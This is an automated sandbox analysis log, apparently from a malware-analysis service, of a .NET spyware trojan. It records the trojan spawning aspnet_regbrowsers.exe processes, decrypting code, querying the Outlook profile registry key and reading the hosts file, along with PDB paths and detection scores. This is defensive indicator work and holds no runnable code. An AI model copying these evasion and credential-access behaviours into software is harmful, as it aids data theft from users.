                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02721B00
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272A090
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02723D40
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_027271C0
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_027271BC
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02724770
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272476B
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272D518
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02723D0F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0169B748
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_01696BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B33F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B8960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B0CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_01824800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_018281C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_01824710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0182D6D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646059E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646B208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464B88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06469908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064676B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646E588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064653D0
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilename vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuaAFllYGbTewxRVnYOHBNjJG.exe4 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261051389.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.301512168.0000000000412000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.302293725.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamefixedhost.dll0 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeVirustotal: Detection: 35%
                      Source: W7UbgU8x18.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile read: C:\Users\user\Desktop\W7UbgU8x18.exeJump to behavior
                      Source: W7UbgU8x18.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\W7UbgU8x18.exe "C:\Users\user\Desktop\W7UbgU8x18.exe"
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/7@1/2
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1768:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5644
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: W7UbgU8x18.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb""9s source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.270613865.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270476484.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.283477132.000000000501C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270533710.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271835064.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270427827.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb, source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb6 source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: fixedhost.pdb\ source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3|n source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb source: W7UbgU8x18.exe
                      Source: Binary string: fixedhost.pdbMZ@ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Z.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb* source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb4 source: WER343.tmp.dmp.10.dr
                      Source: Binary string: mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Windows\tuneraidfix.pdbpdbfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdbP source: W7UbgU8x18.exe, 00000000.00000000.256076792.0000000000C18000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.302604429.0000000000C18000.00000004.00000020.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\user\Desktop\W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbW source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER343.tmp.dmp.10.dr
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
